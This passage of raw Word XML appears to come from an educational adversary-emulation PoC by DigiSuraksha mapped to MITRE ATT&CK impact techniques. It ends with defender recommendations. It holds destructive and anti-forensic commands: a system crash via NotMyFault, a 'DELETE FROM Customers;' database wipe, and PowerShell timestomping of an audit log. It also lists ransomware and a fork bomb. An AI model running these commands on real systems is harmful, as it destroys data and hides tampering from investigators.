          <w:numId w:val="76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lastRenderedPageBreak/>
        <w:t>Trigger crash via NotMyFault.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005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NotMyFault.exe /crash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Technique 3: T1565 – Data Manipulation (Alter Databases)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sabotage integrity.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1 – SQL Injection to Delete Data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77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DELETE FROM Customers;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Procedure 2 – Timestomping Logs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Modify timestamps to hide tampering:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Get-Item "C:\Logs\audit.log").LastWriteTime = "01/01/2020"  </w:t>
      </w:r>
    </w:p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Summary of Flow for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261"/>
        <w:gridCol w:w="3637"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidTr="00BF2273">
        <w:trPr>
          <w:tblHeader/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Technique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pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1884">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action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1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T1486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Encrypt files with ransomware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2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T1499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Fork bomb to crash Linux servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidTr="00BF2273">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr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3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T1565</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2CEED" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884">
            <w:r w:rsidRPr="002D1884">
              <w:t>Wipe SQL database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes operational disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A21F0" w:rsidRPr="0051368C" w:rsidRDefault="002D1884" w:rsidP="0051368C">
      <w:r w:rsidRPr="002D1884">
        <w:pict>
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>This PoC demonstrates how adversaries use Reconnaissance, Initial Access, and Execution tactics in real-world attacks. Defenders should:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Monitor PowerShell logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Block macros in Office files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Restrict cloud API permissions.</w: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Further Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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Simulate phishing campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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>Audit cloud permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF2273" w:rsidRDefault="00BF2273" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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MITRE ATT&amp;CK® Enterprise Matrix: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="0051368C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/tactics/enterprise/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="00E2005A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51368C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Security Blog: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="0051368C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/security/blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051368C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>© DigiSuraksha — Parhari Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051368C" w:rsidRPr="0051368C" w:rsidRDefault="0051368C" w:rsidP="0051368C">
      <w:r w:rsidRPr="0051368C">
        <w:pict>
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="004B3952" w:rsidRPr="0051368C" w:rsidRDefault="004B3952" w:rsidP="0051368C"/>
    <w:sectPr w:rsidR="004B3952" w:rsidRPr="0051368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899"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80CE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308A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48CE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2C52DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C1C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D0FC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB78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3195"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1E8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362D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A9A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06B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="203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C462B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57EC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032995"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3EA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3B1282"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C58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876F37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC48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A4F46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D156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AA111A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8982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773D8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17D2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DED76FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EC85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55429"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBBA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FC0C56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECBA2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5D19E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30CE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880E38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6256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471685"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D9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894B28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AC8E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D057C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E376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586CB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15B4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C74AC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15A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A0547C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B49E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270D52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FC0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DE3FF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F1E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068604C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AE2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C43289"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0EA5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3646A5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CF68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3D4281F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC14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0A7438"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C2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8C30910"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D390C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9125829"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1E2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A1C33CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F688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9065BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F68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3F1A62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7C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BC3FF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE30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473DD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7228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17B68B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA78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27B60CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28D0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2B015C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98D4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096535"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1FA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11540E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8FA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FB96826"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B8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27508E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21C0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D07888"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83BE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20B5E52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E72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E05316"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="745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7A5285"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E882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964377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD24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9CC6401"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CF4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A450E90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B326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5720AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B19E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CE55FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39062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342234"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACAA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F2B6EFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D172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59201EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B802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142010"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C32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BD2491C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0FE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FF46FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64D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802B87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A02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5BD5993"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A1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C43D86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3A2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F54684"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF8A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A562A38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7FC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D1F1A5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B722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540BAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCD4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9626F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8E4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2EE75BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AC2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EA1803"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BFE8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BA6333"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2F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776E25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="862C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9C710A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6048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D76FAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4E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43361E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6C4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E5E408C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8BA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D56236"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="161A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1"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="69">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="70">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="71">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="72">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="73">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="74">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="75">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="76">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="77">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="78">
    <w:abstractNumId w:val="6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52"/>
    <w:rsid w:val="002D1884"/>
    <w:rsid w:val="004B3952"/>
    <w:rsid w:val="0051368C"/>
    <w:rsid w:val="005F0A90"/>
    <w:rsid w:val="007A21F0"/>
    <w:rsid w:val="00BF2273"/>
    <w:rsid w:val="00E2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3420"/>
  <w15:docId w15:val="{13FC7925-5697-43EE-99B1-44F76723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136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136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6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www.microsoft.com/security/blo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attack.mitre.org/tactics/enterprise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2800</Words>
  <Characters>15961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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-05T21:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-05T21:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>